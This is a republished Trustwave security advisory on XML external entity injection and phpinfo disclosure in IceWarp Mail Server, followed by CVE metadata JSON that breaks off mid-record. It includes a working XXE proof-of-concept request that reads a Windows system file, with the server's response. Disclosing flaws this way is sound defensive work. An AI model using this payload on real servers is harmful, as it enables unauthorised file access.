Search...

TWSL2011-013: Multiple Vulnerabilities in IceWarp Mail Server

2011-09-26T00:00:00

ID SECURITYVULNS:DOC:27071
Type securityvulns
Reporter Securityvulns
Modified 2011-09-26T00:00:00

Description

Trustwave's SpiderLabs Security Advisory TWSL2011-013: Multiple Vulnerabilities in IceWarp Mail Server

https://www.trustwave.com/spiderlabs/advisories/TWSL2011-013.txt

Published: 2011-09-23 Version: 1.0

Vendor: IceWarp (http://www.icewarp.com) Product: IceWarp Mail Server Version affected: 10.3.2 and below

Product description: IceWarp WebMail is the web front-end for the IceWarp Mail Server, which provides email access on over 50,000 servers. IceWarp WebMail provides web-based access to email, calendars, contacts, files and shared data from any computer with a browser and Internet connection.

Credit: David Kirkpatrick of Trustwave's SpiderLabs

Finding 1: XML External Entity Injection CVE: CVE-2011-3579

An external entity is a function of the XML specification which allows XML documents to reference resources external to the XML document. This functionality forces the XML parser of the application to access the resource specified.

In this case it is possible to inject an XML DOCTYPE "SYSTEM" directive to access local files on the operating system where the IceWarp server is installed. Using this technique it is possible to retrieve readable files on the operating system. This attack can also be used to create a possible denial of service condition.

Proof-of-Concept:

The following POST request was sent to the host A.B.C.D where the IceWarp mail server was running:

REQUEST

POST /-....--.._1243848280/server/webmail.php HTTP/1.1 Host:A.B.C.D User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0 Accept:text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language:en-gb,en;q=0.5i've Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Proxy-Connection: keep-alive Referer: http://A.B.C.D Content-Length: 249 Content-Type: application/xml;charset=UTF-8 Pragma: no-cache Cache-Control: no-cache

<!DOCTYPE foo [<!ENTITY xxeb91c4 SYSTEM "file:///c:/windows/win.ini"> ]><iq type="set"><query xmlns="webmail:iq:auth"><username>test&xxeb91c4;</username><digest>828cd27c 6fb73ee32674602e9c5521f005c614f5fb9266fd071dab323b5079e02d47a421c01df2efffc d2bdb221e15bf2baa4acefe38f264d92d152878ca4d33</digest><method>RSA</method>< /query></iq>

RESPONSE:

HTTP/1.1 200 OK Server: IceWarp/9.4.2 Date: Wed, 20 Jul 2011 10:04:56 GMT Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control:no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/xml Vary: Accept-Encoding Content-Length: 1113

<?xml version="1.0" encoding="utf-8"?><iq type="error"><error uid="login_invalid">test; for 16-bit app support [fonts] [extensions] [mci extensions] [files] [Mail] MAPI=1 ...TRUNCATED

The above proof-of-concept would retrieve the c:\windows\win.ini file (the response in this example has been truncated).

Finding 2: PHP Information Disclosure CVE: CVE-2011-3580

It is possible to retrieve the PHP information file phpinfo() by accessing the following URL http://A.B.C.D/server where A.B.C.D is the IP of the server running the IceWarp software. The response will be a page detailing the PHP version used and the configuration settings of PHP, including system details.

Vendor Response: These issues have been addressed as of version 10.3.3

Remediation Steps: Customers should update to the latest version of IceWarp Mail Server in order to address these issues. The above issues have been corrected in version 10.3.3.

Revision History: 08/03/11 - Vulnerability disclosed 09/19/11 - Patch released 09/23/11 - Advisory published

About Trustwave: Trustwave is the leading provider of on-demand and subscription-based information security and payment card industry compliance management solutions to businesses and government entities throughout the world. For organizations faced with today's challenging data security and compliance environment, Trustwave provides a unique approach with comprehensive solutions that include its flagship TrustKeeper compliance management software and other proprietary security solutions. Trustwave has helped thousands of organizations--ranging from Fortune 500 businesses and large financial institutions to small and medium-sized retailers--manage compliance and secure their network infrastructure, data communications and critical information assets. Trustwave is headquartered in Chicago with offices throughout North America, South America, Europe, Africa, China and Australia. For more information, visit https://www.trustwave.com

About Trustwave's SpiderLabs: SpiderLabs is the advance security team at Trustwave responsible for incident response and forensics, ethical hacking and application security tests for Trustwave's clients. SpiderLabs has responded to hundreds of security incidents, performed thousands of ethical hacking exercises and tested the security of hundreds of business applications for Fortune 500 organizations. For more information visit https://www.trustwave.com/spiderlabs

Disclaimer: The information provided in this advisory is provided "as is" without warranty of any kind. Trustwave disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Trustwave or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Trustwave or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.

This transmission may contain information that is privileged, confidential, and/or exempt from disclosure under applicable law. If you are not the intended recipient, you are hereby notified that any disclosure, copying, distribution, or use of the information contained herein (including any reliance thereon) is STRICTLY PROHIBITED. If you received this transmission in error, please immediately contact the sender and destroy the material in its entirety, whether in electronic or hard copy format.

JSON Vulners Source

Initial Source

{"id": "SECURITYVULNS:DOC:27071", "bulletinFamily": "software", "title": "TWSL2011-013: Multiple Vulnerabilities in IceWarp Mail Server", "description": "Trustwave's SpiderLabs Security Advisory TWSL2011-013:\r\nMultiple Vulnerabilities in IceWarp Mail Server\r\n\r\nhttps://www.trustwave.com/spiderlabs/advisories/TWSL2011-013.txt\r\n\r\nPublished: 2011-09-23\r\nVersion: 1.0\r\n\r\nVendor: IceWarp (http://www.icewarp.com)\r\nProduct: IceWarp Mail Server\r\nVersion affected: 10.3.2 and below\r\n\r\nProduct description: IceWarp WebMail is the web front-end for the IceWarp\r\nMail Server, which provides email access on over 50,000 servers. IceWarp\r\nWebMail provides web-based access to email, calendars, contacts, files\r\nand shared data from any computer with a browser and Internet connection.\r\n\r\nCredit: David Kirkpatrick of Trustwave's SpiderLabs\r\n\r\nFinding 1: XML External Entity Injection\r\nCVE: CVE-2011-3579\r\n\r\nAn external entity is a function of the XML specification which allows XML\r\ndocuments to reference resources external to the XML document. This\r\nfunctionality forces the XML parser of the application to access the\r\nresource specified.\r\n\r\nIn this case it is possible to inject an XML DOCTYPE "SYSTEM" directive to\r\naccess local files on the operating system where the IceWarp server is\r\ninstalled. Using this technique it is possible to retrieve readable files\r\non the operating system. This attack can also be used to create a possible\r\ndenial of service condition.\r\n\r\nProof-of-Concept:\r\n\r\nThe following POST request was sent to the host A.B.C.D where the IceWarp\r\nmail server was running:\r\n\r\nREQUEST\r\n=========\r\nPOST /-.._._.--.._1243848280/server/webmail.php HTTP/1.1\r\nHost:A.B.C.D User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:5.0)\r\nGecko/20100101 Firefox/5.0\r\nAccept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language:en-gb,en;q=0.5i've\r\nAccept-Encoding: gzip, deflate\r\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\nProxy-Connection: keep-alive\r\nReferer: http://A.B.C.D\r\nContent-Length: 249\r\nContent-Type: application/xml;charset=UTF-8\r\nPragma: no-cache\r\nCache-Control: no-cache\r\n\r\n<!DOCTYPE foo [<!ENTITY xxeb91c4 SYSTEM "file:///c:/windows/win.ini"> ]><iq\r\ntype="set"><query\r\nxmlns="webmail:iq:auth"><username>test&xxeb91c4;</username><digest>828cd27c\r\n6fb73ee32674602e9c5521f005c614f5fb9266fd071dab323b5079e02d47a421c01df2efffc\r\nd2bdb221e15bf2baa4acefe38f264d92d152878ca4d33</digest><method>RSA</method><\r\n/query></iq>\r\n\r\nRESPONSE:\r\n==========\r\nHTTP/1.1 200 OK\r\nServer: IceWarp/9.4.2\r\nDate: Wed, 20 Jul 2011 10:04:56 GMT\r\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\r\nCache-Control:no-store, no-cache, must-revalidate, post-check=0,\r\npre-check=0 Pragma: no-cache\r\nContent-Type: text/xml\r\nVary: Accept-Encoding\r\nContent-Length: 1113\r\n\r\n<?xml version="1.0" encoding="utf-8"?><iq type="error"><error\r\nuid="login_invalid">test; for 16-bit app support\r\n[fonts]\r\n[extensions]\r\n[mci extensions]\r\n[files]\r\n[Mail]\r\nMAPI=1\r\n...TRUNCATED\r\n\r\nThe above proof-of-concept would retrieve the c:\windows\win.ini file (the\r\nresponse in this example has been truncated).\r\n\r\n\r\nFinding 2: PHP Information Disclosure\r\nCVE: CVE-2011-3580\r\n\r\nIt is possible to retrieve the PHP information file phpinfo() by accessing\r\nthe following URL http://A.B.C.D/server where A.B.C.D is the IP of the\r\nserver running the IceWarp software. The response will be a page detailing\r\nthe PHP version used and the configuration settings of PHP, including\r\nsystem details.\r\n\r\n\r\nVendor Response: These issues have been addressed as of version 10.3.3\r\n\r\nRemediation Steps: Customers should update to the latest version of IceWarp\r\nMail Server in order to address these issues. The above issues have been\r\ncorrected in version 10.3.3.\r\n\r\nRevision History:\r\n08/03/11 - Vulnerability disclosed\r\n09/19/11 - Patch released\r\n09/23/11 - Advisory published\r\n\r\n\r\nAbout Trustwave: Trustwave is the leading provider of on-demand and\r\nsubscription-based information security and payment card industry\r\ncompliance management solutions to businesses and government entities\r\nthroughout the world. For organizations faced with today's challenging\r\ndata security and compliance environment, Trustwave provides a unique\r\napproach with comprehensive solutions that include its flagship\r\nTrustKeeper compliance management software and other proprietary security\r\nsolutions. Trustwave has helped thousands of organizations--ranging from\r\nFortune 500 businesses and large financial institutions to small and\r\nmedium-sized retailers--manage compliance and secure their network\r\ninfrastructure, data communications and critical information assets.\r\nTrustwave is headquartered in Chicago with offices throughout North\r\nAmerica, South America, Europe, Africa, China and Australia. For more\r\ninformation, visit https://www.trustwave.com\r\n\r\nAbout Trustwave's SpiderLabs: SpiderLabs is the advance security team at\r\nTrustwave responsible for incident response and forensics, ethical hacking\r\nand application security tests for Trustwave's clients. SpiderLabs has\r\nresponded to hundreds of security incidents, performed thousands of ethical\r\nhacking exercises and tested the security of hundreds of business\r\napplications for Fortune 500 organizations. For more information visit\r\nhttps://www.trustwave.com/spiderlabs\r\n\r\nDisclaimer: The information provided in this advisory is provided "as is"\r\nwithout warranty of any kind. Trustwave disclaims all warranties, either\r\nexpress or implied, including the warranties of merchantability and fitness\r\nfor a particular purpose. In no event shall Trustwave or its suppliers be\r\nliable for any damages whatsoever including direct, indirect, incidental,\r\nconsequential, loss of business profits or special damages, even if\r\nTrustwave or its suppliers have been advised of the possibility of such\r\ndamages. Some states do not allow the exclusion or limitation of liability\r\nfor consequential or incidental damages so the foregoing limitation may not\r\napply.\r\n\r\n\r\n\r\n\r\n\r\nThis transmission may contain information that is privileged, confidential, and/or exempt from disclosure under applicable law. If you are not the intended recipient, you are hereby notified that any disclosure, copying, distribution, or use of the information contained herein (including any reliance thereon) is STRICTLY PROHIBITED. If you received this transmission in error, please immediately contact the sender and destroy the material in its entirety, whether in electronic or hard copy format.\r\n", "published": "2011-09-26T00:00:00", "modified": "2011-09-26T00:00:00", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:PARTIAL/"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:27071", "reporter": "Securityvulns", "references": [], "cvelist": ["CVE-2011-3580", "CVE-2011-3579"], "type": "securityvulns", "lastseen": "2018-08-31T11:10:42", "edition": 1, "viewCount": 27, "enchantments": {"score": {"value": 6.4, "vector": "NONE", "modified": "2018-08-31T11:10:42", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2011-3579", "CVE-2011-3580"]}, {"type": "openvas", "idList": ["OPENVAS:103279", "OPENVAS:1361412562310902478", "OPENVAS:1361412562310103279"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:105320"]}, {"type": "exploitdb", "idList": ["EDB-ID:36165"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:11920"]}], "modified": "2018-08-31T11:10:42", "rev": 2}, "vulnersScore": 6.4}, "affectedSoftware": [], "immutableFields": [], "cvss2": {}, "cvss3": {}}

{"cve": [{"id": "CVE-2011-3579", "bulletinFamily": "NVD", "title": "CVE-2011-3579", "description": "server/webmail.php in IceWarp WebMail in IceWarp Mail Server before 10.3.3 allows remote attackers to read arbitrary files, and possibly send HTTP requests to intranet servers or cause a denial of service (CPU and memory consumption), via an XML external entity declaration in conjunction with an entity reference.", "published": "2011-09-30T17:55:00", "modified": "2017-08-29T01:30:00", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:P"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-3579", "reporter": "cve@mitre.org", "references": ["http://www.securityfocus.com/bid/49753", "https://exchange.xforce.ibmcloud.com/vulnerabilities/70025", "https://www.trustwave.com/spiderlabs/advisories/TWSL2011-013.txt", "http://archives.neohapsis.com/archives/bugtraq/2011-09/0145.html", "http://www.osvdb.org/75721", "http://securitytracker.com/id?1026093", "http://securityreason.com/securityalert/8404"], "cvelist": ["CVE-2011-3579"], "type": "cve", "lastseen": "2021-04-22T23:19:42", "history": [{"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "9.3.0"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "10.0.7"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "10.1.2"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "9.3.1"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "10.0.8"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "10.3.0"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "10.2.1"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "10.1.4"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "10.2.0"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "9.4.0"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "9.4.1"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "10.3.1"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "10.1.1"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "10.2.2"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "10.0.3"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "9.4.2"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "10.0.4"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "10.1.3"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "9.3.2"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "le", "version": "10.3.2"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:icewarp:mail_server:10.1.1", "cpe:/a:icewarp:mail_server:10.3.0", "cpe:/a:icewarp:mail_server:9.4.1", "cpe:/a:icewarp:mail_server:10.2.0", "cpe:/a:icewarp:mail_server:10.3.2", "cpe:/a:icewarp:mail_server:10.3.1", "cpe:/a:icewarp:mail_server:9.3.2", "cpe:/a:icewarp:mail_server:10.1.2", "cpe:/a:icewarp:mail_server:10.0.8", "cpe:/a:icewarp:mail_server:9.3.1", "cpe:/a:icewarp:mail_server:10.0.4", "cpe:/a:icewarp:mail_server:10.2.1", "cpe:/a:icewarp:mail_server:10.1.4", "cpe:/a:icewarp:mail_server:10.2.2", "cpe:/a:icewarp:mail_server:10.0.3", "cpe:/a:icewarp:mail_server:9.4.0", "cpe:/a:icewarp:mail_server:9.4.2", "cpe:/a:icewarp:mail_server:10.1.3", "cpe:/a:icewarp:mail_server:10.0.7", "cpe:/a:icewarp:mail_server:9.3.0"], "cpe23": ["cpe:2.3:a:icewarp:mail_server:10.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:9.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:9.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:9.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:9.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:9.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:9.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.3.1:*:*:*:*:*:*:*"], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:10.3.1:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:10.1.3:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:10.0.8:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:9.3.0:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:10.0.3:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:9.4.0:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:9.4.1:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:10.2.2:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:9.3.2:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:9.4.2:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:10.1.1:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:10.0.7:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:10.3.2:*:*:*:*:*:*:*", "versionEndIncluding": "10.3.2", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:10.1.2:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:10.3.0:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:10.2.0:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:10.0.4:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:10.1.4:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:9.3.1:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:10.2.1:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2011-3579"], "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:P"}, "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.4, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {}, "cwe": ["CWE-399"], "description": "server/webmail.php in IceWarp WebMail in IceWarp Mail Server before 10.3.3 allows remote attackers to read arbitrary files, and possibly send HTTP requests to intranet servers or cause a denial of service (CPU and memory consumption), via an XML external entity declaration in conjunction with an entity reference.", "edition": 6, "enchantments": {"dependencies": {"modified": "2021-02-02T05:51:06", "references": [{"idList": ["EDB-ID:36165"], "type": "exploitdb"}, {"idList": ["OPENVAS:103279", "OPENVAS:1361412562310103279", "OPENVAS:1361412562310902478"], "type": "openvas"}, {"idList": ["SECURITYVULNS:DOC:27071", "SECURITYVULNS:VULN:11920"], "type": "securityvulns"}, {"idList": ["PACKETSTORM:105320"], "type": "packetstorm"}], "rev": 2}, "score": {"modified": "2021-02-02T05:51:06", "rev": 2, "value": 5.8, "vector": "NONE"}}, "extraReferences": [{"name": "49753", "refsource": "BID", "tags": ["Exploit"], "url": "http://www.securityfocus.com/bid/49753"}, {"name": "icewarpwebmail-xml-info-disclosure(70025)", "refsource": "XF", "tags": [], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/70025"}, {"name": "https://www.trustwave.com/spiderlabs/advisories/TWSL2011-013.txt", "refsource": "MISC", "tags": ["Exploit"], "url": "https://www.trustwave.com/spiderlabs/advisories/TWSL2011-013.txt"}, {"name": "1026093", "refsource": "SECTRACK", "tags": [], "url": "http://securitytracker.com/id?1026093"}, {"name": "8404", "refsource": "SREASON", "tags": [], "url": "http://securityreason.com/securityalert/8404"}, {"name": "75721", "refsource": "OSVDB", "tags": [], "url": "http://www.osvdb.org/75721"}, {"name": "20110923 TWSL2011-013: Multiple Vulnerabilities in IceWarp Mail Server", "refsource": "BUGTRAQ", "tags": ["Exploit"], "url": "http://archives.neohapsis.com/archives/bugtraq/2011-09/0145.html"}], "hash": "de13f1bc75de519a7e7abd30cb7b460e8ba4783b40c31ce55d9ec557192857ed", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "8c88ddd69a6143ba0ab41056d05284e3", "key": "description"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "315d7a7b15cda393ce9fffb73645c6c3", "key": "cvss2"}, {"hash": "8372bab5a2b07ce8c58960126bc7fa81", "key": "cpeConfiguration"}, {"hash": "79f130ef461e5fcadeacc002df89c60a", "key": "modified"}, {"hash": "cd349445e80e8b2179f25196bdaf10dc", "key": "cpe"}, {"hash": "3cde474b2224e87bfd63c573a9755353", "key": "href"}, {"hash": "873d8334dac92d89e23af0e7431aa456", "key": "cvelist"}, {"hash": "ad748ca54d687532479fdfb825a5f871", "key": "affectedSoftware"}, {"hash": "9b257ef804cfe63c30c04ab15f4e91cd", "key": "cvss"}, {"hash": "86bba9f2ca4a7fd1c9e14dc44bf74c08", "key": "title"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "ca496f4d15cd17b520751f0eae5489e8", "key": "extraReferences"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "c5f73a003796a1ee2c10cd02ae7d86b2", "key": "cpe23"}, {"hash": "1c0be0631b7bf4c3a8c83298e68c99eb", "key": "cwe"}, {"hash": "07d3f7b2955caa3b6538d5a344d51a1d", "key": "published"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "b7db5d3270b65057ac35eed580d4c1fd", "key": "references"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-3579", "id": "CVE-2011-3579", "immutableFields": [], "lastseen": "2021-02-02T05:51:06", "modified": "2017-08-29T01:30:00", "objectVersion": "1.5", "published": "2011-09-30T17:55:00", "references": ["http://www.securityfocus.com/bid/49753", "https://exchange.xforce.ibmcloud.com/vulnerabilities/70025", "https://www.trustwave.com/spiderlabs/advisories/TWSL2011-013.txt", "http://archives.neohapsis.com/archives/bugtraq/2011-09/0145.html", "http://www.osvdb.org/75721", "http://securitytracker.com/id?1026093", "http://securityreason.com/securityalert/8404"], "reporter": "cve@mitre.org", "title": "CVE-2011-3579", "type": "cve", "viewCount": 4}, "different_elements": ["cpeConfiguration"], "edition": 6, "lastseen": "2021-02-02T05:51:06"}, {"bulletin": {"affectedSoftware": [{"name": "icewarp mail_server", "operator": "eq", "version": "9.4.0"}, {"name": "icewarp mail_server", "operator": "eq", "version": "10.0.3"}, {"name": "icewarp mail_server", "operator": "eq", "version": "9.3.1"}, {"name": "icewarp mail_server", "operator": "le", "version": "10.3.2"}, {"name": "icewarp mail_server", "operator": "eq", "version": "10.0.8"}, {"name": "icewarp mail_server", "operator": "eq", "version": "10.1.1"}, {"name": "icewarp mail_server", "operator": "eq", "version": "10.2.0"}, {"name": "icewarp mail_server", "operator": "eq", "version": "10.1.3"}, {"name": "icewarp mail_server", "operator": "eq", "version": "9.3.0"}, {"name": "icewarp mail_server", "operator": "eq", "version": "10.3.1"}, {"name": "icewarp mail_server", "operator": "eq", "version": "9.3.2"}, {"name": "icewarp mail_server", "operator": "eq", "version": "10.1.2"}, {"name": "icewarp mail_server", "operator": "eq", "version": "10.0.7"}, {"name": "icewarp mail_server", "operator": "eq", "version": "10.3.0"}, {"name": "icewarp mail_server", "operator": "eq", "version": "10.1.4"}, {"name": "icewarp mail_server", "operator": "eq", "version": "9.4.1"}, {"name": "icewarp mail_server", "operator": "eq", "version": "9.4.2"}, {"name": "icewarp mail_server", "operator": "eq", "version": "10.2.2"}, {"name": "icewarp mail_server", "operator": "eq", "version": "10.0.4"}, {"name": "icewarp mail_server", "operator": "eq", "version": "10.2.1"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:icewarp:mail_server:10.1.1", "cpe:/a:icewarp:mail_server:10.3.0", "cpe:/a:icewarp:mail_server:9.4.1", "cpe:/a:icewarp:mail_server:10.2.0", "cpe:/a:icewarp:mail_server:10.3.1", "cpe:/a:icewarp:mail_server:9.3.2", "cpe:/a:icewarp:mail_server:10.1.2", "cpe:/a:icewarp:mail_server:10.0.8", "cpe:/a:icewarp:mail_server:9.3.1", "cpe:/a:icewarp:mail_server:10.0.4", "cpe:/a:icewarp:mail_server:10.2.1", "cpe:/a:icewarp:mail_server:10.1.4", "cpe:/a:icewarp:mail_server:10.2.2", "cpe:/a:icewarp:mail_server:10.0.3", "cpe:/a:icewarp:mail_server:9.4.0", "cpe:/a:icewarp:mail_server:9.4.2", "cpe:/a:icewarp:mail_server:10.1.3", "cpe:/a:icewarp:mail_server:10.0.7", "cpe:/a:icewarp:mail_server:9.3.0"], "cpe23": ["cpe:2.3:a:icewarp:mail_server:10.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:9.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:9.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:9.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:9.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:9.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:9.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.3.1:*:*:*:*:*:*:*"], "cvelist": ["CVE-2011-3579"], "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:P"}, "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.4, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {}, "cwe": ["CWE-399"], "description": "server/webmail.php in IceWarp WebMail in IceWarp Mail Server before 10.3.3 allows remote attackers to read arbitrary files, and possibly send 